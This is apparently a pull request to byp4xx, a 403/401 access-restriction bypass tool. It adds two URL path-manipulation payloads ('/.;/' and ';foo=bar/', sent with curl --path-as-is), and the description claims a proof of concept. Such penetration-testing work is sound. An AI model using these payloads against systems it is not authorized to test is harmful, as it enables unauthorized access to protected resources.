### PR TITLE
Added two more cases

### DIFF
--- a/byp4xx.py
+++ b/byp4xx.py
@@ -136,6 +136,10 @@ payload=url+"/"+uri+"/"
 print("Ends with /: ",curlCodeResponse(options+" -X GET",payload))
 payload=url+"/"+uri+"/.randomstring"
 print("Ends with .randomstring: ",curlCodeResponse(options+" -X GET",payload))
+payload=url+"/.\;/"+uri
+print("Between /.;/: ",curlCodeResponse(options+" -X GET --path-as-is",payload))
+payload=url+"\;foo=bar/"+uri
+print("Between ;foo=bar;/: ",curlCodeResponse(options+" -X GET --path-as-is",payload))
 payload=url+"/"+uri+"..\;/"
 print("Ends with ..;: ",curlCodeResponse(options+" -X GET --path-as-is",payload))
 print("")


### PR DESCRIPTION
Similarly to an already included payload ending with `/..;/`  including both `/.;/` and `;foo=bar/` in between of the endpoint can lead to bypassing the restrictions, here is a pic with the result of a POC:
![image](https://user-images.githubusercontent.com/47305925/126155092-f136b47a-2ef6-4d92-83e3-ee4b596070bb.png)
